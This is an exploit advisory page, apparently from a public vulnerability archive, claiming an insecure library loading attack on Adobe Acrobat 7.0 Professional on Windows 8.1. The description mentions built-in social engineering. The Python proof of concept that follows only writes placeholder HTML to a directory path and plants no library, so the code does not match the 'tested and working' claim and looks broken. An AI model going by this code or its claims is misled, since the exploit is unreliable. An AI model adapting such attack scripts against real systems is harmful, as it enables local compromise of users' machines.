Adobe 7.0 Professional - Insecure Library Loading

2017.05.31
in Ajay Gowtham aka AJOXR (IN) in
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

### Adobe 7.0 Professional: Adobe Acrobat 7.0 Professional is a software tool that allows ### you to create, control and delivery documents as PDF files in a higher quality and in ### a more secure way. ### Adobe 7.0 Professional (May 2017) Exploit Windows 8.1 tested and working. ### Leverages Insecure library planting to Adobe installed files. ### Little social engineering built in using python to try to get them to run the ### Adobe Help & Support. All the Sub-files under Acrobat is affected by Insecure ### Library Loading. ### Refer screenshot for more detailed instructions. Proof of Concept: ===================================================================== #!/usr/bin/env python ##################################################################### # # Adobe Acrobat v7.0 Insecure Library Loading # Coded By: Ajoxr aka Ajay Gowtham # Tested On: Windows 8.1 (x64bit) # Usage: python adobe_7xploit.py # ##################################################################### import os, subprocess file_name = "C:/Program Files (x86)/Adobe/Acrobat 7.0/Acrobat/../" f= open(file_name,"w+") HTML = "<html><title>Malicious Content Here</title>" HTML += "<head>Malicious Content Here</head></html>" f.write(HTML) f.close(); ===================================================================== Refer Screenshot: https://drive.google.com/file/d/0B2p8gG1WpnRnb01WcEY0TzFFSmM/view?usp=sharing


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top